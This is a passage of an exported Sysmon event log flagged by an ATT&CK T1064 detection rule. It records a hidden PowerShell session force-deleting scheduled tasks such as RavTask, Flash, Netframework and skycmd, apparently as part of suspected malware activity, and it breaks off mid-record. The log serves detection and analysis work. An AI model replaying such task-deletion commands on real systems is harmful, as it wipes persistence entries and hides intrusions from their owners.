{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.333864100Z"",""eventRecordID"":""2826"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.326\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00103dda2100}\r\nProcessId: 7896\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.326"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00103dda2100}"",""processId"":""7896"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.010",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.292 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00109cd82100} +ProcessId: 7900 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.297276400Z"",""eventRecordID"":""2825"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.292\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00109cd82100}\r\nProcessId: 7900\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.292"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00109cd82100}"",""processId"":""7900"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.963",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.258 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fdd62100} +ProcessId: 5692 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.262375800Z"",""eventRecordID"":""2824"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.258\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fdd62100}\r\nProcessId: 5692\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.258"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010fdd62100}"",""processId"":""5692"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.947",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.225 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001065d52100} +ProcessId: 4360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.230234600Z"",""eventRecordID"":""2823"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.225\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001065d52100}\r\nProcessId: 4360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.225"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001065d52100}"",""processId"":""4360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.900",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.185 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001090d22100} +ProcessId: 8056 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.189567800Z"",""eventRecordID"":""2822"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.185\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001090d22100}\r\nProcessId: 8056\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.185"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001090d22100}"",""processId"":""8056"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.885",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.083 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f7cf2100} +ProcessId: 6192 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.085653300Z"",""eventRecordID"":""2821"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.083\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f7cf2100}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.083"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010f7cf2100}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.869",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.045 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f6cd2100} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd 